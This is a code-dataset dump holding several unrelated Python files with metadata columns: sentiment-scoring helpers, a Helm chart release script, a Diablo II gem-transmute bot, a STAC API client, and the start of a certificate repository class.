max_stars_repo_path
stringlengths
4
286
max_stars_repo_name
stringlengths
5
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.03M
content_cleaned
stringlengths
6
1.03M
language
stringclasses
111 values
language_score
float64
0.03
1
comments
stringlengths
0
556k
edu_score
float64
0.32
5.03
edu_int_score
int64
0
5
python/calc_sum.py
lukasjoc/scritps
0
6627851
<reponame>lukasjoc/scritps<gh_stars>0 def factorize(lol, facts): for k, v in facts.items(): if v > 1: lol.append(k**v) else: lol.append(k) prod = 1 for factor in lol: prod = prod * factor return prod if __name__ == "__main__": facts = {7: 1, 5113051: 1} lol = [] print(factorize(lol, facts))
def factorize(lol, facts): for k, v in facts.items(): if v > 1: lol.append(k**v) else: lol.append(k) prod = 1 for factor in lol: prod = prod * factor return prod if __name__ == "__main__": facts = {7: 1, 5113051: 1} lol = [] print(factorize(lol, facts))
none
1
3.491346
3
nlp_models.py
Spotify-Song-3/data-science
0
6627852
import nltk from nltk.sentiment.vader import SentimentIntensityAnalyzer nltk.download('vader_lexicon') nltk.download('punkt') sid = SentimentIntensityAnalyzer() import spacy from spacy.tokenizer import Tokenizer nlp = spacy.load("en_core_web_lg") tokenizer = Tokenizer(nlp.vocab) STOP_WORDS = nlp.Defaults.stop_words import pandas as pd from nltk.stem import PorterStemmer ps = PorterStemmer() def processed_score(data=lyrics): tokens = [] df = pd.DataFrame(data.split(), columns=['words']) for doc in tokenizer.pipe(df['words']): doc_tokens = [] for token in doc: if (token.is_stop == False) & (token.is_punct == False): doc_tokens.append(token.text.lower()) tokens.append(doc_tokens) df['tokens'] = tokens word_list = sum(list([item for item in df['tokens'] if len(item) != 0]), []) lyrics_processed = ' '.join(word_list) scores = sid.polarity_scores(lyrics_processed) return scores def stemmed_score(data=lyrics): """ Processes the text via spacy """ tokens = [] words = [] # Stemming for word in data.split(): words.append(ps.stem(word)) df = pd.DataFrame(words, columns=['words']) for doc in tokenizer.pipe(df['words']): doc_tokens = [] for token in doc: if (token.is_stop == False) & (token.is_punct == False): doc_tokens.append(token.text.lower()) tokens.append(doc_tokens) df['tokens'] = tokens word_list = sum(list([item for item in df['tokens'] if len(item) != 0]), []) lyrics_processed = ' '.join(word_list) scores = sid.polarity_scores(lyrics_processed) return scores def get_lemmas(data): """ Gets lemmas for text """ lemmas = [] doc = nlp(data) for token in doc: if ((token.is_stop == False) and (token.is_punct == False)) and (token.pos_!= 'PRON'): lemmas.append(token.lemma_) return lemmas def lemma_score(data=lyrics): """ Processes the text via spacy """ tokens = [] words = [] # Lemmatization words = get_lemmas(data) df = pd.DataFrame(words, columns=['words']) for doc in tokenizer.pipe(df['words']): doc_tokens = [] for token in doc: if (token.is_stop == False) & 
(token.is_punct == False): doc_tokens.append(token.text.lower()) tokens.append(doc_tokens) df['tokens'] = tokens word_list = sum(list([item for item in df['tokens'] if len(item) != 0]), []) lyrics_processed = ' '.join(word_list) scores = sid.polarity_scores(lyrics_processed) return scores
import nltk from nltk.sentiment.vader import SentimentIntensityAnalyzer nltk.download('vader_lexicon') nltk.download('punkt') sid = SentimentIntensityAnalyzer() import spacy from spacy.tokenizer import Tokenizer nlp = spacy.load("en_core_web_lg") tokenizer = Tokenizer(nlp.vocab) STOP_WORDS = nlp.Defaults.stop_words import pandas as pd from nltk.stem import PorterStemmer ps = PorterStemmer() def processed_score(data=lyrics): tokens = [] df = pd.DataFrame(data.split(), columns=['words']) for doc in tokenizer.pipe(df['words']): doc_tokens = [] for token in doc: if (token.is_stop == False) & (token.is_punct == False): doc_tokens.append(token.text.lower()) tokens.append(doc_tokens) df['tokens'] = tokens word_list = sum(list([item for item in df['tokens'] if len(item) != 0]), []) lyrics_processed = ' '.join(word_list) scores = sid.polarity_scores(lyrics_processed) return scores def stemmed_score(data=lyrics): """ Processes the text via spacy """ tokens = [] words = [] # Stemming for word in data.split(): words.append(ps.stem(word)) df = pd.DataFrame(words, columns=['words']) for doc in tokenizer.pipe(df['words']): doc_tokens = [] for token in doc: if (token.is_stop == False) & (token.is_punct == False): doc_tokens.append(token.text.lower()) tokens.append(doc_tokens) df['tokens'] = tokens word_list = sum(list([item for item in df['tokens'] if len(item) != 0]), []) lyrics_processed = ' '.join(word_list) scores = sid.polarity_scores(lyrics_processed) return scores def get_lemmas(data): """ Gets lemmas for text """ lemmas = [] doc = nlp(data) for token in doc: if ((token.is_stop == False) and (token.is_punct == False)) and (token.pos_!= 'PRON'): lemmas.append(token.lemma_) return lemmas def lemma_score(data=lyrics): """ Processes the text via spacy """ tokens = [] words = [] # Lemmatization words = get_lemmas(data) df = pd.DataFrame(words, columns=['words']) for doc in tokenizer.pipe(df['words']): doc_tokens = [] for token in doc: if (token.is_stop == False) & 
(token.is_punct == False): doc_tokens.append(token.text.lower()) tokens.append(doc_tokens) df['tokens'] = tokens word_list = sum(list([item for item in df['tokens'] if len(item) != 0]), []) lyrics_processed = ' '.join(word_list) scores = sid.polarity_scores(lyrics_processed) return scores
en
0.525063
Processes the text via spacy # Stemming Gets lemmas for text Processes the text via spacy # Lemmatization
2.97175
3
5_Functions/B_parameters.py
Oscar-Oliveira/Python3
0
6627853
""" Parameters """ def write_names(value1, value2): print("{} : {}".format(value1, value2)) def print_max(value1, value2): if value1 >= value2: print(value1) else: print(value2) def say(value, qty): print(value * qty) write_names("Student1", "123") write_names("Student2", "456") write_names("Student3", "789") print() value1 = 10 value2 = 12 print("Max ({}, {}): ".format(value1, value2)) print_max(value1, value2) print() say("Python", value1)
""" Parameters """ def write_names(value1, value2): print("{} : {}".format(value1, value2)) def print_max(value1, value2): if value1 >= value2: print(value1) else: print(value2) def say(value, qty): print(value * qty) write_names("Student1", "123") write_names("Student2", "456") write_names("Student3", "789") print() value1 = 10 value2 = 12 print("Max ({}, {}): ".format(value1, value2)) print_max(value1, value2) print() say("Python", value1)
ta
0.050049
Parameters
3.889729
4
scripts/update-helm.py
mkorthof/wg-access-server
0
6627854
<gh_stars>0 #!/usr/bin/env python3 # This script is intended to be run within GitHub Actions, triggered after new tags have been created. # It updates the version in the Helm Chart, packages it, renders the k8s quickstart.yaml, then commits and pushes everything. # A separate workflow triggered on pushes should then publish the charts to the GitHub Pages website. import os import subprocess import yaml version = os.environ.get('GITHUB_REF_NAME') ref_type = os.environ.get('GITHUB_REF_TYPE') if not version or ref_type != 'tag': print('::error::Aborting, workflow not triggered by tag event') exit(1) # update the helm chart and quickstart manifest with open('deploy/helm/wg-access-server/Chart.yaml', 'r+') as f: chart = yaml.safe_load(f) chart['version'] = version chart['appVersion'] = version f.seek(0) yaml.dump(chart, f, default_flow_style=False) f.truncate() with open('deploy/k8s/quickstart.yaml', 'w') as f: subprocess.run(['helm', 'template', '--name-template', 'quickstart', 'deploy/helm/wg-access-server/'], stdout=f) subprocess.run(['helm', 'package', 'deploy/helm/wg-access-server/', '--destination', 'docs/charts/']) subprocess.run(['helm', 'repo', 'index', 'docs/', '--url', 'https://freie-netze.org/wg-access-server']) # commit changes subprocess.run(['git', 'add', 'docs/index.yaml', 'docs/charts/', 'deploy/helm/', 'deploy/k8s/']) subprocess.run(['git', 'commit', '-m', f'{version} - Automated Helm & k8s update']) # push everything subprocess.run(['git', 'push'])
#!/usr/bin/env python3 # This script is intended to be run within GitHub Actions, triggered after new tags have been created. # It updates the version in the Helm Chart, packages it, renders the k8s quickstart.yaml, then commits and pushes everything. # A separate workflow triggered on pushes should then publish the charts to the GitHub Pages website. import os import subprocess import yaml version = os.environ.get('GITHUB_REF_NAME') ref_type = os.environ.get('GITHUB_REF_TYPE') if not version or ref_type != 'tag': print('::error::Aborting, workflow not triggered by tag event') exit(1) # update the helm chart and quickstart manifest with open('deploy/helm/wg-access-server/Chart.yaml', 'r+') as f: chart = yaml.safe_load(f) chart['version'] = version chart['appVersion'] = version f.seek(0) yaml.dump(chart, f, default_flow_style=False) f.truncate() with open('deploy/k8s/quickstart.yaml', 'w') as f: subprocess.run(['helm', 'template', '--name-template', 'quickstart', 'deploy/helm/wg-access-server/'], stdout=f) subprocess.run(['helm', 'package', 'deploy/helm/wg-access-server/', '--destination', 'docs/charts/']) subprocess.run(['helm', 'repo', 'index', 'docs/', '--url', 'https://freie-netze.org/wg-access-server']) # commit changes subprocess.run(['git', 'add', 'docs/index.yaml', 'docs/charts/', 'deploy/helm/', 'deploy/k8s/']) subprocess.run(['git', 'commit', '-m', f'{version} - Automated Helm & k8s update']) # push everything subprocess.run(['git', 'push'])
en
0.788305
#!/usr/bin/env python3 # This script is intended to be run within GitHub Actions, triggered after new tags have been created. # It updates the version in the Helm Chart, packages it, renders the k8s quickstart.yaml, then commits and pushes everything. # A separate workflow triggered on pushes should then publish the charts to the GitHub Pages website. # update the helm chart and quickstart manifest # commit changes # push everything
2.221245
2
classes/manpage.py
ravermeister/xmpp-chatbot
1
6627855
# coding=utf-8 from common.strings import StaticAnswers # Linux Manpages Request class ManPageRequest: """ > query the Linux Manpages for the given argument """ def __init__(self, static_answers: StaticAnswers): # init all necessary variables self.static_answers = static_answers self.target, self.opt_arg = None, None # noinspection PyUnusedLocal def format(self, queries, target, opt_arg): self.target = target self.opt_arg = opt_arg man_url = "https://man.cx/" reply = man_url + self.target return reply
# coding=utf-8 from common.strings import StaticAnswers # Linux Manpages Request class ManPageRequest: """ > query the Linux Manpages for the given argument """ def __init__(self, static_answers: StaticAnswers): # init all necessary variables self.static_answers = static_answers self.target, self.opt_arg = None, None # noinspection PyUnusedLocal def format(self, queries, target, opt_arg): self.target = target self.opt_arg = opt_arg man_url = "https://man.cx/" reply = man_url + self.target return reply
en
0.315484
# coding=utf-8 # Linux Manpages Request > query the Linux Manpages for the given argument # init all necessary variables # noinspection PyUnusedLocal
3.061816
3
src/transmute/transmute.py
JohnStyleZ/botty
1
6627856
from asyncore import loop import itertools from random import randint, random import threading from config import Config from .inventory_collection import InventoryCollection from .stash import Stash from .gem_picking import SimpleGemPicking from item.item_finder import ItemFinder from screen import Screen from ui.ui_manager import UiManager from utils.custom_mouse import mouse from utils.misc import wait from version import __version__ from logger import Logger from game_stats import GameStats from template_finder import TemplateFinder import numpy as np import keyboard import os import cv2 FLAWLESS_GEMS = [ "INVENTORY_TOPAZ_FLAWLESS", "INVENTORY_AMETHYST_FLAWLESS", "INVENTORY_SAPPHIRE_FLAWLESS", "INVENTORY_DIAMOND_FLAWLESS", "INVENTORY_RUBY_FLAWLESS", "INVENTORY_EMERALD_FLAWLESS", "INVENTORY_SKULL_FLAWLESS" ] PERFECT_GEMS = [ "INVENTORY_TOPAZ_PERFECT", "INVENTORY_AMETHYST_PERFECT", "INVENTORY_SAPPHIRE_PERFECT", "INVENTORY_DIAMOND_PERFECT", "INVENTORY_RUBY_PERFECT", "INVENTORY_EMERALD_PERFECT", "INVENTORY_SKULL_PERFECT" ] class Transmute: @staticmethod def _wait(): wait(0.2, 0.3) def __init__(self, screen: Screen, template_finder: TemplateFinder, game_stats: GameStats, ui_manager: UiManager) -> None: self._screen = screen self._game_stats = game_stats self._template_finder = template_finder self._ui_manager = ui_manager self._last_game = 0 def pick_from_area(self, column, row, roi): slot_w = Config.ui_pos["slot_width"] slot_h = Config.ui_pos["slot_height"] offset_y = (row+0.5)*slot_h offset_x = (column+0.5)*slot_w x, y, _, _ = roi x, y = self._screen.convert_screen_to_monitor( (x + offset_x, y + offset_y)) mouse.move(x, y) self._wait() keyboard.send('ctrl', do_release=False) self._wait() mouse.click("left") self._wait() keyboard.release('ctrl') self._wait() def open_cube(self): self._ui_manager._move_to_stash_tab(0) screen = self._screen.grab() match = self._template_finder.search( ["HORADRIC_CUBE"], screen, threshold=0.9, roi=Config.ui_roi["left_inventory"]) if 
match.valid: x, y = self._screen.convert_screen_to_monitor(match.center) mouse.move(x, y) self._wait() mouse.click("right") self._wait() else: Logger.error(f"Can't find cube: {match.score}") def transmute(self): screen = self._screen.grab() match = self._template_finder.search( ["CUBE_TRANSMUTE_BTN"], screen, roi=Config.ui_roi["cube_btn_roi"]) if match.valid: x, y = self._screen.convert_screen_to_monitor(match.center) mouse.move(x, y) self._wait() mouse.click("left") self._wait() def close_cube(self): self._wait() keyboard.send("esc") def stash_all_items(self): self._ui_manager.stash_all_items( Config.char["num_loot_columns"], ItemFinder()) def pick_from_cube_at(self, column, row): return self.pick_from_area(column, row, Config.ui_roi["cube_area_roi"]) def pick_from_inventory_at(self, column, row): return self.pick_from_area(column, row, Config.ui_roi["right_inventory"]) def pick_from_stash_at(self, index, column, row): self._ui_manager._move_to_stash_tab(index) return self.pick_from_area(column, row, Config.ui_roi["left_inventory"]) def inspect_area(self, total_rows, total_columns, roi, known_items) -> InventoryCollection: result = InventoryCollection() x, y, w, h = roi img = self._screen.grab()[y:y+h, x:x+w] slot_w = Config.ui_pos["slot_width"] slot_h = Config.ui_pos["slot_height"] for column, row in itertools.product(range(total_columns), range(total_rows)): y_start, y_end = row*slot_h, slot_h*(row+1) x_start, x_end = column*slot_w, slot_w*(column+1) slot_img = img[y_start:y_end, x_start:x_end] if not self._is_slot_empty(slot_img[+4:-4, +4:-4], treshold=36): result.set_empty((column, row)) match = self._template_finder.search( known_items, slot_img, threshold=0.91, best_match=True) if match.valid: result.append(match.name, (column, row)) return result def _is_slot_empty(self, img, treshold=16.0): slot_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) avg_brightness = np.average(slot_img[:, :, 2]) return avg_brightness > treshold def inspect_inventory_area(self, 
known_items) -> InventoryCollection: return self.inspect_area(4, Config.char["num_loot_columns"], Config.ui_roi["right_inventory"], known_items) def inspect_stash(self) -> Stash: stash = Stash() for i in range(4): self._ui_manager._move_to_stash_tab(i) wait(0.4, 0.5) tab = self.inspect_area( 10, 10, Config.ui_roi["left_inventory"], FLAWLESS_GEMS) stash.add_tab(i, tab) return stash def put_back_to_stash_randomly(self) -> None: flawless_gems = self.inspect_inventory_area(FLAWLESS_GEMS) pick = [] for gem in flawless_gems.all_items(): while flawless_gems.count_by(gem) > 0: pick.append((randint(0, 3), *flawless_gems.pop(gem))) for tab, x, y in sorted(pick, key=lambda x: x[0]): self._ui_manager._move_to_stash_tab(tab) self.pick_from_inventory_at(x, y) def select_tab_with_enough_space(self, s: Stash) -> None: tabs_priority = Config._transmute_config["stash_destination"] for tab in tabs_priority: if s.get_empty_on_tab(tab) > 0: self._ui_manager._move_to_stash_tab(tab) break def put_back_all_gems(self, s: Stash) -> None: Logger.info( f'Putting back gems in the following stash tabs (by priority): {Config._transmute_config["stash_destination"]}') perfect_gems = self.inspect_inventory_area( PERFECT_GEMS + FLAWLESS_GEMS) for gem in perfect_gems.all_items(): while perfect_gems.count_by(gem) > 0: self.select_tab_with_enough_space(s) self.pick_from_inventory_at(*perfect_gems.pop(gem)) def should_transmute(self) -> bool: every_x_game = Config._transmute_config["transmute_every_x_game"] if every_x_game is None or every_x_game == "" or int(every_x_game) <= 0: return False return self._game_stats._game_counter - self._last_game >= int(every_x_game) def run_transmutes(self, force=False) -> None: gold_btn = self._template_finder.search_and_wait("INVENTORY_GOLD_BTN", roi=Config.ui_roi["gold_btn"], time_out=20) if not gold_btn.valid: Logger.error("Could not determine to be in stash menu. Continue...") return if not force and not self.should_transmute(): Logger.info(f"Skipping transmutes. 
Force: {force}, Game#: {self._game_stats._game_counter}") return None self._run_gem_transmutes() def check_cube_empty(self) -> bool: self.open_cube() area = self.inspect_cube() self.close_cube() return area.count_empty() == 12 def inspect_cube(self)-> InventoryCollection: return self.inspect_area(4, 3, roi=Config.ui_roi["cube_area_roi"], known_items=FLAWLESS_GEMS) def _run_gem_transmutes(self) -> None: Logger.info("Starting gem transmute") self._last_game = self._game_stats._game_counter s = self.inspect_stash() algorithm = SimpleGemPicking(s) inventory = self.inspect_inventory_area(FLAWLESS_GEMS) is_cube_empty = None while True: while inventory.count_empty() >= 3: next_batch = algorithm.next_batch() is_cube_empty = self.check_cube_empty() if is_cube_empty is None else is_cube_empty if not is_cube_empty: Logger.warning("Some items detected in the cube. Skipping transmute") break if next_batch is None: Logger.info("No more gems to cube") break for tab, gem, x, y in next_batch: self.pick_from_stash_at(tab, x, y) inventory = self.inspect_inventory_area(FLAWLESS_GEMS) if inventory.count() >= 3: self.open_cube() for gem in inventory.all_items(): while inventory.count_by(gem) > 0: for _ in range(3): next = inventory.pop(gem) self.pick_from_inventory_at(*next) self.transmute() self.pick_from_cube_at(2, 3) self.close_cube() self.put_back_all_gems(s) else: self.put_back_all_gems(s) break Logger.info("Finished gem transmute")
from asyncore import loop import itertools from random import randint, random import threading from config import Config from .inventory_collection import InventoryCollection from .stash import Stash from .gem_picking import SimpleGemPicking from item.item_finder import ItemFinder from screen import Screen from ui.ui_manager import UiManager from utils.custom_mouse import mouse from utils.misc import wait from version import __version__ from logger import Logger from game_stats import GameStats from template_finder import TemplateFinder import numpy as np import keyboard import os import cv2 FLAWLESS_GEMS = [ "INVENTORY_TOPAZ_FLAWLESS", "INVENTORY_AMETHYST_FLAWLESS", "INVENTORY_SAPPHIRE_FLAWLESS", "INVENTORY_DIAMOND_FLAWLESS", "INVENTORY_RUBY_FLAWLESS", "INVENTORY_EMERALD_FLAWLESS", "INVENTORY_SKULL_FLAWLESS" ] PERFECT_GEMS = [ "INVENTORY_TOPAZ_PERFECT", "INVENTORY_AMETHYST_PERFECT", "INVENTORY_SAPPHIRE_PERFECT", "INVENTORY_DIAMOND_PERFECT", "INVENTORY_RUBY_PERFECT", "INVENTORY_EMERALD_PERFECT", "INVENTORY_SKULL_PERFECT" ] class Transmute: @staticmethod def _wait(): wait(0.2, 0.3) def __init__(self, screen: Screen, template_finder: TemplateFinder, game_stats: GameStats, ui_manager: UiManager) -> None: self._screen = screen self._game_stats = game_stats self._template_finder = template_finder self._ui_manager = ui_manager self._last_game = 0 def pick_from_area(self, column, row, roi): slot_w = Config.ui_pos["slot_width"] slot_h = Config.ui_pos["slot_height"] offset_y = (row+0.5)*slot_h offset_x = (column+0.5)*slot_w x, y, _, _ = roi x, y = self._screen.convert_screen_to_monitor( (x + offset_x, y + offset_y)) mouse.move(x, y) self._wait() keyboard.send('ctrl', do_release=False) self._wait() mouse.click("left") self._wait() keyboard.release('ctrl') self._wait() def open_cube(self): self._ui_manager._move_to_stash_tab(0) screen = self._screen.grab() match = self._template_finder.search( ["HORADRIC_CUBE"], screen, threshold=0.9, roi=Config.ui_roi["left_inventory"]) if 
match.valid: x, y = self._screen.convert_screen_to_monitor(match.center) mouse.move(x, y) self._wait() mouse.click("right") self._wait() else: Logger.error(f"Can't find cube: {match.score}") def transmute(self): screen = self._screen.grab() match = self._template_finder.search( ["CUBE_TRANSMUTE_BTN"], screen, roi=Config.ui_roi["cube_btn_roi"]) if match.valid: x, y = self._screen.convert_screen_to_monitor(match.center) mouse.move(x, y) self._wait() mouse.click("left") self._wait() def close_cube(self): self._wait() keyboard.send("esc") def stash_all_items(self): self._ui_manager.stash_all_items( Config.char["num_loot_columns"], ItemFinder()) def pick_from_cube_at(self, column, row): return self.pick_from_area(column, row, Config.ui_roi["cube_area_roi"]) def pick_from_inventory_at(self, column, row): return self.pick_from_area(column, row, Config.ui_roi["right_inventory"]) def pick_from_stash_at(self, index, column, row): self._ui_manager._move_to_stash_tab(index) return self.pick_from_area(column, row, Config.ui_roi["left_inventory"]) def inspect_area(self, total_rows, total_columns, roi, known_items) -> InventoryCollection: result = InventoryCollection() x, y, w, h = roi img = self._screen.grab()[y:y+h, x:x+w] slot_w = Config.ui_pos["slot_width"] slot_h = Config.ui_pos["slot_height"] for column, row in itertools.product(range(total_columns), range(total_rows)): y_start, y_end = row*slot_h, slot_h*(row+1) x_start, x_end = column*slot_w, slot_w*(column+1) slot_img = img[y_start:y_end, x_start:x_end] if not self._is_slot_empty(slot_img[+4:-4, +4:-4], treshold=36): result.set_empty((column, row)) match = self._template_finder.search( known_items, slot_img, threshold=0.91, best_match=True) if match.valid: result.append(match.name, (column, row)) return result def _is_slot_empty(self, img, treshold=16.0): slot_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) avg_brightness = np.average(slot_img[:, :, 2]) return avg_brightness > treshold def inspect_inventory_area(self, 
known_items) -> InventoryCollection: return self.inspect_area(4, Config.char["num_loot_columns"], Config.ui_roi["right_inventory"], known_items) def inspect_stash(self) -> Stash: stash = Stash() for i in range(4): self._ui_manager._move_to_stash_tab(i) wait(0.4, 0.5) tab = self.inspect_area( 10, 10, Config.ui_roi["left_inventory"], FLAWLESS_GEMS) stash.add_tab(i, tab) return stash def put_back_to_stash_randomly(self) -> None: flawless_gems = self.inspect_inventory_area(FLAWLESS_GEMS) pick = [] for gem in flawless_gems.all_items(): while flawless_gems.count_by(gem) > 0: pick.append((randint(0, 3), *flawless_gems.pop(gem))) for tab, x, y in sorted(pick, key=lambda x: x[0]): self._ui_manager._move_to_stash_tab(tab) self.pick_from_inventory_at(x, y) def select_tab_with_enough_space(self, s: Stash) -> None: tabs_priority = Config._transmute_config["stash_destination"] for tab in tabs_priority: if s.get_empty_on_tab(tab) > 0: self._ui_manager._move_to_stash_tab(tab) break def put_back_all_gems(self, s: Stash) -> None: Logger.info( f'Putting back gems in the following stash tabs (by priority): {Config._transmute_config["stash_destination"]}') perfect_gems = self.inspect_inventory_area( PERFECT_GEMS + FLAWLESS_GEMS) for gem in perfect_gems.all_items(): while perfect_gems.count_by(gem) > 0: self.select_tab_with_enough_space(s) self.pick_from_inventory_at(*perfect_gems.pop(gem)) def should_transmute(self) -> bool: every_x_game = Config._transmute_config["transmute_every_x_game"] if every_x_game is None or every_x_game == "" or int(every_x_game) <= 0: return False return self._game_stats._game_counter - self._last_game >= int(every_x_game) def run_transmutes(self, force=False) -> None: gold_btn = self._template_finder.search_and_wait("INVENTORY_GOLD_BTN", roi=Config.ui_roi["gold_btn"], time_out=20) if not gold_btn.valid: Logger.error("Could not determine to be in stash menu. Continue...") return if not force and not self.should_transmute(): Logger.info(f"Skipping transmutes. 
Force: {force}, Game#: {self._game_stats._game_counter}") return None self._run_gem_transmutes() def check_cube_empty(self) -> bool: self.open_cube() area = self.inspect_cube() self.close_cube() return area.count_empty() == 12 def inspect_cube(self)-> InventoryCollection: return self.inspect_area(4, 3, roi=Config.ui_roi["cube_area_roi"], known_items=FLAWLESS_GEMS) def _run_gem_transmutes(self) -> None: Logger.info("Starting gem transmute") self._last_game = self._game_stats._game_counter s = self.inspect_stash() algorithm = SimpleGemPicking(s) inventory = self.inspect_inventory_area(FLAWLESS_GEMS) is_cube_empty = None while True: while inventory.count_empty() >= 3: next_batch = algorithm.next_batch() is_cube_empty = self.check_cube_empty() if is_cube_empty is None else is_cube_empty if not is_cube_empty: Logger.warning("Some items detected in the cube. Skipping transmute") break if next_batch is None: Logger.info("No more gems to cube") break for tab, gem, x, y in next_batch: self.pick_from_stash_at(tab, x, y) inventory = self.inspect_inventory_area(FLAWLESS_GEMS) if inventory.count() >= 3: self.open_cube() for gem in inventory.all_items(): while inventory.count_by(gem) > 0: for _ in range(3): next = inventory.pop(gem) self.pick_from_inventory_at(*next) self.transmute() self.pick_from_cube_at(2, 3) self.close_cube() self.put_back_all_gems(s) else: self.put_back_all_gems(s) break Logger.info("Finished gem transmute")
en
0.630254
#: {self._game_stats._game_counter}")
2.013327
2
models/api.py
suricactus/qgis-stac-browser
0
6627857
<reponame>suricactus/qgis-stac-browser<filename>models/api.py import re from urllib.parse import urlparse from .collection import Collection from .link import Link from .search_result import SearchResult from ..utils import network class API: def __init__(self, json=None): self._json = json self._data = self._json.get('data', None) self._collections = [ Collection(self, c) for c in self._json.get('collections', []) ] def load(self): self._data = network.request(f'{self.href}/stac') self._collections = [ self.load_collection(c) for c in self.collection_ids ] def load_collection(self, collection_id): return Collection(self, network.request( f'{self.href}/collections/{collection_id}')) def search_items(self, collections=[], bbox=[], start_time=None, end_time=None, page=1, next_page=None, limit=50, on_next_page=None, page_limit=10): if page > page_limit: return [] if on_next_page is not None: on_next_page(self) if end_time is None: time = start_time.strftime('%Y-%m-%dT%H:%M:%SZ') else: start = start_time.strftime('%Y-%m-%dT%H:%M:%SZ') end = end_time.strftime('%Y-%m-%dT%H:%M:%SZ') time = f'{start}/{end}' body = { 'collections': [c.id for c in collections], 'bbox': bbox, 'time': time, 'limit': limit } if next_page is not None: body['next'] = next_page else: body['page'] = page search_result = SearchResult(self, network.request( f'{self.href}/stac/search', data=body)) items = search_result.items if len(items) >= limit: items.extend(self.search_items(collections, bbox, start_time, end_time, page + 1, search_result.next, limit, on_next_page=on_next_page)) return items def collection_id_from_href(self, href): p = re.compile(r'\/collections\/(.*)') m = p.match(urlparse(href).path) if m is None: return None if m.groups() is None: return None return m.groups()[0] @property def json(self): return { 'id': self.id, 'href': self.href, 'data': self.data, 'collections': [c.json for c in self.collections], } @property def id(self): return self._json.get('id', None) @property def 
title(self): return self.data.get('title', self.href) @property def href(self): return self._json.get('href', None) @property def version(self): return self.data.get('stac_version', None) @property def description(self): return self.data.get('description', None) @property def data(self): if self._data is None: return {} return self._data @property def links(self): return [Link(l) for l in self.data.get('links', [])] @property def collection_ids(self): collection_ids = [] p = re.compile(r'\/collections\/(.*)') for link in self.links: m = p.match(urlparse(link.href).path) if m is None: continue if m.groups() is None: continue collection_ids.append(m.groups()[0]) return collection_ids @property def collections(self): return self._collections def __lt__(self, other): return self.title.lower() < other.title.lower()
import re from urllib.parse import urlparse from .collection import Collection from .link import Link from .search_result import SearchResult from ..utils import network class API: def __init__(self, json=None): self._json = json self._data = self._json.get('data', None) self._collections = [ Collection(self, c) for c in self._json.get('collections', []) ] def load(self): self._data = network.request(f'{self.href}/stac') self._collections = [ self.load_collection(c) for c in self.collection_ids ] def load_collection(self, collection_id): return Collection(self, network.request( f'{self.href}/collections/{collection_id}')) def search_items(self, collections=[], bbox=[], start_time=None, end_time=None, page=1, next_page=None, limit=50, on_next_page=None, page_limit=10): if page > page_limit: return [] if on_next_page is not None: on_next_page(self) if end_time is None: time = start_time.strftime('%Y-%m-%dT%H:%M:%SZ') else: start = start_time.strftime('%Y-%m-%dT%H:%M:%SZ') end = end_time.strftime('%Y-%m-%dT%H:%M:%SZ') time = f'{start}/{end}' body = { 'collections': [c.id for c in collections], 'bbox': bbox, 'time': time, 'limit': limit } if next_page is not None: body['next'] = next_page else: body['page'] = page search_result = SearchResult(self, network.request( f'{self.href}/stac/search', data=body)) items = search_result.items if len(items) >= limit: items.extend(self.search_items(collections, bbox, start_time, end_time, page + 1, search_result.next, limit, on_next_page=on_next_page)) return items def collection_id_from_href(self, href): p = re.compile(r'\/collections\/(.*)') m = p.match(urlparse(href).path) if m is None: return None if m.groups() is None: return None return m.groups()[0] @property def json(self): return { 'id': self.id, 'href': self.href, 'data': self.data, 'collections': [c.json for c in self.collections], } @property def id(self): return self._json.get('id', None) @property def title(self): return self.data.get('title', self.href) @property def 
href(self): return self._json.get('href', None) @property def version(self): return self.data.get('stac_version', None) @property def description(self): return self.data.get('description', None) @property def data(self): if self._data is None: return {} return self._data @property def links(self): return [Link(l) for l in self.data.get('links', [])] @property def collection_ids(self): collection_ids = [] p = re.compile(r'\/collections\/(.*)') for link in self.links: m = p.match(urlparse(link.href).path) if m is None: continue if m.groups() is None: continue collection_ids.append(m.groups()[0]) return collection_ids @property def collections(self): return self._collections def __lt__(self, other): return self.title.lower() < other.title.lower()
none
1
2.5854
3
trust_stores_observatory/certificates_repository.py
stefanb/trust_stores_observatory
0
6627858
from binascii import hexlify
from pathlib import Path
import os
from typing import Union, List

from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.hashes import SHA256
from cryptography.hazmat.primitives.serialization import Encoding
from cryptography.x509 import Certificate, load_pem_x509_certificate


class CertificateNotFoundError(KeyError):
    """Raised when no stored certificate matches the requested fingerprint."""
    pass


class RootCertificatesRepository:
    """A local folder where we store as many root certificates (as PEM files) as possible.
    """

    def __init__(self, local_root_path: Path) -> None:
        self._path = local_root_path

        # Eagerly parse every stored PEM file; file names only encode the
        # SHA-256 fingerprint, so SHA-1 lookups need an in-memory map.
        all_certificates = []
        for pem_file_path in self._path.glob('*.pem'):
            with open(pem_file_path) as pem_file:
                cert_pem = pem_file.read()
            cert = load_pem_x509_certificate(cert_pem.encode(encoding='ascii'), default_backend())
            all_certificates.append(cert)

        self._all_certificates = all_certificates

        # Parse each certificate so we can look them up with SHA1
        self._sha1_map = {cert.fingerprint(hashes.SHA1()): cert for cert in self._all_certificates}

    @classmethod
    def get_default(cls) -> 'RootCertificatesRepository':
        """Return the repository shipped alongside this package ('../certificates')."""
        root_path = Path(os.path.abspath(os.path.dirname(__file__))) / '..' / 'certificates'
        return cls(root_path)

    def get_all_certificates(self) -> List[Certificate]:
        return self._all_certificates

    def lookup_certificate_with_fingerprint(
            self,
            fingerprint: bytes,
            hash_algorithm: Union[hashes.SHA1, hashes.SHA256] = hashes.SHA256(),
    ) -> Certificate:
        """Find a stored certificate by SHA-1 or SHA-256 fingerprint.

        Raises CertificateNotFoundError when no match exists and
        ValueError for unsupported hash algorithms.
        """
        hex_fingerprint = hexlify(fingerprint).decode('ascii')
        if isinstance(hash_algorithm, hashes.SHA1):
            try:
                return self._sha1_map[fingerprint]
            except KeyError:
                raise CertificateNotFoundError(f'Could not find certificate {hex_fingerprint}')
        elif isinstance(hash_algorithm, hashes.SHA256):
            try:
                return self._lookup_certificate_with_sha256_fingerprint(fingerprint)
            except FileNotFoundError:
                raise CertificateNotFoundError(f'Could not find certificate {hex_fingerprint}')
        else:
            raise ValueError('Hash algorithm not supported')

    def _lookup_certificate_with_sha256_fingerprint(self, fingerprint: bytes) -> Certificate:
        hex_fingerprint = hexlify(fingerprint).decode('ascii')
        pem_path = self._path / f'{hex_fingerprint}.pem'
